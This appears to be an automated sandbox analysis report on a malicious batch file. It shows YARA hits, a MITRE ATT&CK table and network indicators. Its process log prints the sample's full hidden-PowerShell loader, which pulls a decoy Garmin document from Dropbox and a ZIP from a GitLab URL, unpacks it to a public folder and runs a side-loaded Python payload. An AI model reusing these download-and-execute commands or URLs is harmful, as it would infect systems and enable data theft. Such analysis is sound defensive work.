                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  Source: Yara match | File source: amsi64_5272.amsi.csv, type: OTHER
                  Source: Yara match | File source: amsi64_5260.amsi.csv, type: OTHER
                  Source: Yara match | File source: Process Memory Space: powershell.exe PID: 5272, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: powershell.exe PID: 5260, type: MEMORYSTR
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp.com 437
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\find.exe find
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe findstr /L /I set "C:\Users\user\Desktop\hngadsfkgj17.bat"
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe findstr /L /I goto "C:\Users\user\Desktop\hngadsfkgj17.bat"
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe findstr /L /I echo "C:\Users\user\Desktop\hngadsfkgj17.bat"
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe findstr /L /I pause "C:\Users\user\Desktop\hngadsfkgj17.bat"
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmp
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\find.exe find
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmp
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx')"
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx'"
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/garvdsf/dsfg/-/raw/main/FGa1712.zip', 'C:\Users\Public\Document.zip')"
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command " C:\Users\Public\Document\pythonw.exe C:\Users\Public\Document\DLLs\ld_312.pd clickapp"
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -command "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; (new-object -typename system.net.webclient).downloadfile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/garmin_campaign_information_for_partners_v10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'c:\users\user\appdata\local\temp\\garmin_campaign_information_for_partners_v10.docx')"
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -command "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; (new-object -typename system.net.webclient).downloadfile('https://gitlab.com/garvdsf/dsfg/-/raw/main/fga1712.zip', 'c:\users\public\document.zip')"
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -command "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; (new-object -typename system.net.webclient).downloadfile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/garmin_campaign_information_for_partners_v10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'c:\users\user\appdata\local\temp\\garmin_campaign_information_for_partners_v10.docx')"
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -command "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; (new-object -typename system.net.webclient).downloadfile('https://gitlab.com/garvdsf/dsfg/-/raw/main/fga1712.zip', 'c:\users\public\document.zip')"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (23 occurrences)
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation (5 occurrences)
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation (5 occurrences)
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation (5 occurrences)
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation

                  Stealing of Sensitive Information

                  Source: Yara match | File source: amsi64_5260.amsi.csv, type: OTHER
                  Source: Yara match | File source: amsi64_2188.amsi.csv, type: OTHER
                  Source: Yara match | File source: Process Memory Space: powershell.exe PID: 5260, type: MEMORYSTR

                  Remote Access Functionality

                  Source: Yara match | File source: amsi64_5260.amsi.csv, type: OTHER
                  Source: Yara match | File source: amsi64_2188.amsi.csv, type: OTHER
                  Source: Yara match | File source: Process Memory Space: powershell.exe PID: 5260, type: MEMORYSTR
                  MITRE ATT&CK Matrix (techniques listed per tactic; the number in parentheses is the number displayed beside that technique in the original matrix)

                  Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
                  Resource Development: Scripting (11); Domains; DNS Server; Virtual Private Server; Server; Botnet
                  Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
                  Execution: Command and Scripting Interpreter (1); PowerShell (1); At; Cron; Launchd; Scheduled Task
                  Persistence: Scripting (11); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
                  Privilege Escalation: Process Injection (11); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
                  Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (21); Process Injection (11); Obfuscated Files or Information (1); DLL Side-Loading (1); Steganography
                  Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
                  Discovery: Security Software Discovery (11); Process Discovery (1); Virtualization/Sandbox Evasion (21); Application Window Discovery (1); File and Directory Discovery (1); System Information Discovery (11)
                  Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
                  Collection: Archive Collected Data (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
                  Command and Control: Encrypted Channel (11); Ingress Tool Transfer (1); Non-Application Layer Protocol (2); Application Layer Protocol (3); Fallback Channels; Multiband Communication
                  Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
                  Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
                  Source | Detection | Scanner | Label | Link
                  hngadsfkgj17.bat | 3% | ReversingLabs | |
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
                  Source | Detection | Scanner | Label | Link
                  https://ucb25d17b678ca30b23ff5714cb7.dl.dropboxusercontent.com/cd/0/get/CghiprcqMx-t_0kStAteoG_83aAw | 0% | Avira URL Cloud | safe |
                  http://ucb25d17b678ca30b23ff5714cb7.dl.dropboxusercontent.com | 0% | Avira URL Cloud | safe |
                  https://ucb25d17b678ca30b23ff5714cb7.dl.dropboxusercontent.com | 0% | Avira URL Cloud | safe |
                  http://www.apache.o | 0% | Avira URL Cloud | safe |
                  Name | IP | Active | Malicious | Antivirus Detection | Reputation
                  edge-block-www-env.dropbox-dns.com | 162.125.69.15 | true | false | | high
                  gitlab.com | 172.65.251.78 | true | false | | high
                  www-env.dropbox-dns.com | 162.125.69.18 | true | false | | high
                  ucb25d17b678ca30b23ff5714cb7.dl.dropboxusercontent.com | unknown | unknown | false | | unknown
                  www.dropbox.com | unknown | unknown | false | | high
                  Name | Malicious | Antivirus Detection | Reputation
                  https://gitlab.com/garvdsf/dsfg/-/raw/main/FGa1712.zip | false | | high
                  https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1 | false | | high
                  Name | Source | Malicious | Antivirus Detection | Reputation
                  http://gitlab.com | powershell.exe, 0000000E.00000002.2354438721.0000028FBF103000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354438721.0000028FBF13D000.00000004.00000800.00020000.00000000.sdmp | false | | high
                  https://www.dropbox.com/service_worker.js | powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmp | false | | high
                  https://gitlab.com/-/sandbox/; | powershell.exe, 0000000E.00000002.2354438721.0000028FBF122000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354438721.0000028FBF103000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354438721.0000028FBF126000.00000004.00000800.00020000.00000000.sdmp | false | | high
                  https://gitlab.com/users/sign_in | powershell.exe, 0000000E.00000002.2354438721.0000028FBF126000.00000004.00000800.00020000.00000000.sdmp | false | | high
                  https://go.microsoft.co | powershell.exe, 00000010.00000002.2544841727.0000029579508000.00000004.00000020.00020000.00000000.sdmp | false | | high
                  https://paper.dropbox.com/ | powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmp | false | | high
                  http://crl.microsoft | powershell.exe, 00000010.00000002.2540762014.00000295771D8000.00000004.00000020.00020000.00000000.sdmp | false | | high
                  https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/garmin_campaign_information_for_partners_v10.do | powershell.exe, 0000000C.00000002.2304178313.000001FEF6766000.00000004.00000020.00020000.00000000.sdmp | false | | high
                  https://www.hellofax.com/ | powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmp | false | | high
                  https://pal-test.adyen.com | powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmp | false | | high
                  http://www.dropbox.com | powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmp | false | | high
                  https://paper.dropbox.com/cloud-docs/edit | powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmp | false | | high
                  https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.do | powershell.exe, 0000000C.00000002.2287555017.000001FE80001000.00000004.00000800.00020000.00000000.sdmp | false | | high
                  https://contoso.com/License | powershell.exe, 00000010.00000002.2439845650.00000295019C6000.00000004.00000800.00020000.00000000.sdmp | false | | high
                  https://snowplow.trx.gitlab.net | powershell.exe, 0000000E.00000002.2354438721.0000028FBF122000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354438721.0000028FBF103000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354438721.0000028FBF126000.00000004.00000800.00020000.00000000.sdmp | false | | high
                  https://app.hellosign.com/ | powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmp | false | |
                                                                high
                                                                https://collector.prd-278964.gl-product-analytics.compowershell.exe, 0000000E.00000002.2354438721.0000028FBF122000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354438721.0000028FBF103000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354438721.0000028FBF126000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://www.hellosign.com/powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://instructorledlearning.dropboxbusiness.com/powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://www.dropbox.com/page_success/powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://gitlab.compowershell.exe, 0000000E.00000002.2354438721.0000028FBE712000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354438721.0000028FBF103000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354438721.0000028FBF126000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354438721.0000028FBF0FE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://www.dropbox.com/powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://www.dropbox.com/pithos/powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://sales.dropboxbusiness.com/powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://ucb25d17b678ca30b23ff5714cb7.dl.dropboxusercontent.com/cd/0/get/CghiprcqMx-t_0kStAteoG_83aAwpowershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://photos.dropbox.com/powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://a.sprig.com/powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://www.docsend.com/powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://www.dropbox.com/encrypted_folder_download/service_worker.jspowershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://gitlab.com/assets/powershell.exe, 0000000E.00000002.2354438721.0000028FBF126000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://new-sentry.gitlab.net/api/4/security/?sentry_key=f5573e26de8f4293b285e556c35dfd6e&sentry_envpowershell.exe, 0000000E.00000002.2354438721.0000028FBF122000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354438721.0000028FBF103000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354438721.0000028FBF126000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://navi.dropbox.jp/powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://contoso.com/powershell.exe, 00000010.00000002.2439845650.00000295019C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://nuget.org/nuget.exepowershell.exe, 0000000C.00000002.2301223891.000001FE90070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2301223891.000001FE901B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE819EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2412081496.0000028FCDC92000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354438721.0000028FBF4BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2412081496.0000028FCDB50000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2524456797.000002951006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2524456797.00000295101B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2439845650.00000295019C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://www.dropbox.com/static/api/powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://edge-block-www-env.dropbox-dns.compowershell.exe, 0000000C.00000002.2287555017.000001FE81668000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://www.dropboxstatic.com/static/powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://apis.google.compowershell.exe, 0000000E.00000002.2354438721.0000028FBF122000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354438721.0000028FBF103000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354438721.0000028FBF126000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://officeapps-df.live.compowershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://api.login.yahoo.com/powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000C.00000002.2287555017.000001FE80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354438721.0000028FBDAE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2439845650.0000029500001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://sentry.gitlab.netpowershell.exe, 0000000E.00000002.2354438721.0000028FBF103000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354438721.0000028FBF126000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://login.yahoo.com/powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://ucb25d17b678ca30b23ff5714cb7.dl.dropboxusercontent.compowershell.exe, 0000000C.00000002.2287555017.000001FE81668000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    https://docsend.com/powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://www.dropbox.com/playlist/powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://www.recaptcha.net/powershell.exe, 0000000E.00000002.2354438721.0000028FBF126000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://onedrive.live.com/pickerpowershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://gitlab.com(powershell.exe, 0000000E.00000002.2354438721.0000028FBF126000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://nuget.org/NuGet.exepowershell.exe, 0000000C.00000002.2301223891.000001FE90070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2301223891.000001FE901B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE819EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2412081496.0000028FCDC92000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354438721.0000028FBF4BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2412081496.0000028FCDB50000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2524456797.000002951006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2524456797.00000295101B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2439845650.00000295019C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://showcase.dropbox.com/powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://www.dropbox.com/static/serviceworker/powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://www.dropbox.compowershell.exe, 0000000C.00000002.2287555017.000001FE80C32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000010.00000002.2439845650.0000029500231000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000010.00000002.2439845650.0000029500231000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://go.micropowershell.exe, 0000000C.00000002.2287555017.000001FE80C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354438721.0000028FBE712000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2439845650.0000029500C31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://new-sentry.gitlab.netpowershell.exe, 0000000E.00000002.2354438721.0000028FBF103000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354438721.0000028FBF126000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
